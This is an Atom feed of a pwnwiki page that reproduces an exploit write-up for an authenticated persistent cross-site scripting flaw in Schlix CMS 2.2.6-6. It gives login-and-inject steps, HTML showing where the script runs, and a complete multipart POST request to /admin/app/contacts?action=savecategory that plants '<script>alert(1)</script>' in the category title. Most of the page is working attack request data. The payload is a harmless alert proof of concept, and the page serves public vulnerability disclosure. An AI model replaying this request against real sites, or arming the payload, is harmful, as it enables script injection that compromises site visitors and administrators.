<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Schlix_CMS_2.2.6-6_-_%27title%27_XSS%E6%BC%8F%E6%B4%9E</id>
	<title>Schlix CMS 2.2.6-6 - 'title' XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Schlix_CMS_2.2.6-6_-_%27title%27_XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Schlix_CMS_2.2.6-6_-_%27title%27_XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T02:11:55Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Schlix_CMS_2.2.6-6_-_%27title%27_XSS%E6%BC%8F%E6%B4%9E&amp;diff=2684&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==XSS== &lt;pre&gt; # Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 # Exploit Author: Emircan Baş  # Vendor Homepag...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Schlix_CMS_2.2.6-6_-_%27title%27_XSS%E6%BC%8F%E6%B4%9E&amp;diff=2684&amp;oldid=prev"/>
		<updated>2021-05-06T11:53:04Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==XSS== &amp;lt;pre&amp;gt; # Exploit Title: Schlix CMS 2.2.6-6 - &amp;#039;title&amp;#039; Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 # Exploit Author: Emircan Baş  # Vendor Homepag...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==XSS==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)&lt;br /&gt;
# Date: 2021-05-05&lt;br /&gt;
# Exploit Author: Emircan Baş &lt;br /&gt;
# Vendor Homepage: https://www.schlix.com/&lt;br /&gt;
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip&lt;br /&gt;
# Version: 2.2.6-6&lt;br /&gt;
# Tested on: Windows &amp;amp; WampServer&lt;br /&gt;
&lt;br /&gt;
==&amp;gt; Tutorial &amp;lt;==&lt;br /&gt;
&lt;br /&gt;
1- Login with your account.&lt;br /&gt;
2- Go to the contacts section. Directory is '/admin/app/contact'.&lt;br /&gt;
3- Create a new category and type an XSS payload into the category title.&lt;br /&gt;
4- XSS payload will be executed when we travel to created page.&lt;br /&gt;
&lt;br /&gt;
==&amp;gt; Vulnerable Source Code &amp;lt;==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;article class=&amp;quot;main category&amp;quot;&amp;gt;	       &lt;br /&gt;
    &amp;lt;div class=&amp;quot;media-header-full-width &amp;quot; style=&amp;quot;background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;div class=&amp;quot;media-header-title container d-flex h-100&amp;quot;&amp;gt;&lt;br /&gt;
            &amp;lt;div class=&amp;quot;row align-self-center w-100&amp;quot;&amp;gt;&lt;br /&gt;
                &amp;lt;div class=&amp;quot;col-8 mx-auto&amp;quot;&amp;gt;&lt;br /&gt;
                    &amp;lt;div class=&amp;quot;text-center&amp;quot;&amp;gt;&lt;br /&gt;
                        &amp;lt;h1 class=&amp;quot;item title&amp;quot; itemprop=&amp;quot;headline&amp;quot;&amp;gt;&amp;amp;#039;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;lt;/h1&amp;gt; # OUR PAYLOAD IS NON-EXECUTEABLE&lt;br /&gt;
                    &amp;lt;/div&amp;gt;&lt;br /&gt;
                &amp;lt;/div&amp;gt;&lt;br /&gt;
            &amp;lt;/div&amp;gt;&lt;br /&gt;
        &amp;lt;/div&amp;gt;&lt;br /&gt;
    &amp;lt;/div&amp;gt;&lt;br /&gt;
    &amp;lt;div class=&amp;quot;breadcrumb-bg&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;div class=&amp;quot;container&amp;quot;&amp;gt;&lt;br /&gt;
           &amp;lt;div class=&amp;quot;breadcrumb-container&amp;quot;&amp;gt;&amp;lt;ol class=&amp;quot;breadcrumb&amp;quot;&amp;gt;&amp;lt;li class=&amp;quot;breadcrumb-item&amp;quot;&amp;gt;&amp;lt;a class=&amp;quot;breadcrumb-home&amp;quot; href=&amp;quot;/cms&amp;quot;&amp;gt;&lt;br /&gt;
           &amp;lt;i class=&amp;quot;fa fa-home&amp;quot;&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;lt;li class=&amp;quot;breadcrumb-item&amp;quot;&amp;gt;&amp;lt;a href=&amp;quot;/cms/contacts/&amp;quot;&amp;gt;Contacts&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;lt;li class=&amp;quot;breadcrumb-item&amp;quot;&amp;gt;&lt;br /&gt;
           &amp;lt;a href=&amp;quot;/cms/contacts/script-alert-2-script/&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;lt;/ol&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt; # EXECUTED PLACE&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==&amp;gt; HTTP Request &amp;lt;==&lt;br /&gt;
&lt;br /&gt;
POST /admin/app/contacts?action=savecategory HTTP/1.1&lt;br /&gt;
Host: (HOST)&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489&lt;br /&gt;
Content-Length: 4146&lt;br /&gt;
Origin: (ORIGIN)&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: (REFERER)&lt;br /&gt;
Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;_csrftoken&amp;quot;&lt;br /&gt;
&lt;br /&gt;
49feefcd2b917b9855cd55c8bd174235fa5912e4&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;cid&amp;quot;&lt;br /&gt;
&lt;br /&gt;
6&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;parent_id&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;guid&amp;quot;&lt;br /&gt;
&lt;br /&gt;
ee34f23a-7167-a454-8576-20bef7575c15&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;title&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;status&amp;quot;&lt;br /&gt;
&lt;br /&gt;
1&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;virtual_filename&amp;quot;&lt;br /&gt;
&lt;br /&gt;
script-alert-1-script&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;summary&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;description&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;meta_description&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;meta_key&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;tags&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;date_available&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;date_expiry&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;items_per_page&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;options[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
display_pagetitle&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;options[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
__null__&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;options[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
display_child_categories&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;options[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
__null__&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;options[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
display_items&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;options[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
__null__&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;options[child_categories_sortby]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
date_created&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;options[items_sortby]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
date_created&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;permission_read_everyone&amp;quot;&lt;br /&gt;
&lt;br /&gt;
everyone&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;permission_read[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
1&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;permission_read[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
2&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;permission_read[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
3&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;permission_write[]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
1&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;cmh_media_selection&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;cmh_media_upload&amp;quot;; filename=&amp;quot;&amp;quot;&lt;br /&gt;
Content-Type: application/octet-stream&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;cmh_media_path&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;cmh_media_url&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------280033592236615772622294478489--&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>